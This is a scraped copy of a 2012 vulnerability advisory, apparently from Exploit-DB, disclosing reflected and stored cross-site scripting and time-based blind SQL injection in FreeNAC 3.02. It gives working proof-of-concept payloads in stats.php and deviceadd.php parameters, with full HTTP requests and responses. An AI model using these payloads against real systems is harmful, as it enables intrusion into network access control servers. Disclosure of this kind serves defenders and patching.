扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 |
FreeNAC version 3.02 SQL Injection and XSS Vulnerabilties Date: May 19, 2012 Author: Blake Software Link: http://sourceforge.net/project/showfiles.php?group_id=170004 Version: 3.02 Tested on: Ubuntu 8.04 (freenac version 3.02 vmware appliance) FreeNAC FreeNAC provides Virtual LAN assignment, LAN access control (for all kinds of network devices such as Servers, Workstations, Printers, IP-Phones ..), live network end-device discovery.Both 802.1x and Cisco's VMPS port security modes are supported. VLAN, switch port management and documentation of Patch cabling is also included. ========================================================================================================================================== Reflective Cross-Site Scripting: Multiple parameters are vulnerable to reflective cross-site scripting. Affected Parameters: comment mac graphtype type name Example Request: GET /stats.php?graphtype=bar&type=vlan13<script>alert(1)</script> HTTP/1.1 Host: 192.168.1.118 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Proxy-Connection: keep-alive Referer: http://192.168.1.118/stats.php?graphtype=bar&type=switch Cookie: freenac=92bcf3d911d94e33106c2e79745e8e8e Example Response: HTTP/1.1 200 OK Date: Sat, 19 May 2012 17:42:41 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 5676 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>FreeNAC :: Swisscom ::</title> <link href="https://www.exploit-db.com/exploits/18900/bw.css" rel="stylesheet" type="text/css" /> </head> <a href='https://www.exploit-db.com/exploits/18900/index.html' title='Main Menu'><img src='https://www.exploit-db.com/exploits/18900/images/logo_small.png' border='0' /></a> ..........snip...................... <img src="https://www.exploit-db.com/exploits/18900/statgraph.php?stattype=vlan13<script>alert(1)</script>&order=DESC&graphtype=bar"><br> <br><p class='UpdateMsg'>Database error</p> <p>Please go <a HREF='javascript:javascript:history.go(-1)'>back to the previous screen</a>, or the <a href='https://www.exploit-db.com/exploits/18900/index.php' >Main Menu</a> and start again, or try again later.</p> ========================================================================================================================================== Stored Cross-Site Scripting: The comment parameter is vulnerable to stored cross-site scripting. Example Request: <changed from a POST to a GET> http://192.168.1.118/deviceadd.php?name=test&mac=0001.0001.0001&status=1&vlan=6&username=2&office=1&comment="><script>alert(2)</script>&action=Update&action_idx=1 Example Response: HTTP/1.1 200 OK Date: Sat, 19 May 2012 17:53:38 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 6945 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>FreeNAC :: Swisscom ::</title> <link href="https://www.exploit-db.com/exploits/18900/bw.css" rel="stylesheet" type="text/css" /> </head> <a href='https://www.exploit-db.com/exploits/18900/index.html' title='Main Menu'><img src='https://www.exploit-db.com/exploits/18900/images/logo_small.png' border='0' /></a> .............snip................. </td></tr> <tr><td>Switch:</td> <td>, port= , location=</td> <td><input type="submit" name="action" class="bluebox" value="Restart Port" /> </td> </tr> <tr><td>Comment:</td><td> <input name="comment" type="text" size=40 value=""><script>alert(2)</script>"/> </td><td>Last IP:NONE<br></td> <tr><td> </td><td></td></tr> <tr><td> </td><td> <input type="submit" name="action" class="bluebox" value="Update" /> <input type="submit" name="action" class="bluebox" value="Delete" onClick="javascript:return confirm('Really DELETE this end-device record?')" /> </td></tr>'<tr><td> </td><td></td></tr> <tr><td> </td><td></td></tr> </table> <table id='t3-2' width='760' border='0' class='text13'><tr><td> </td><td></td></tr> <tr><td colspan=3 bgcolor="#DEDEDE"><b>Administrative information</b><tr><td>Inventory:<td> <tr><td>Classification: ............snip.................... ========================================================================================================================================== SQL Injection: The status parameter is vulnerable to blind SQL Injection. Injecting a time-delay of 20 seconds: http://192.168.1.118/deviceadd.php?name=test&mac=0001.0001.0001&status=1+AND+SLEEP(20)&vlan=6&username=2&office=1&comment=&action=Update&action_idx=1 |
体验盒子
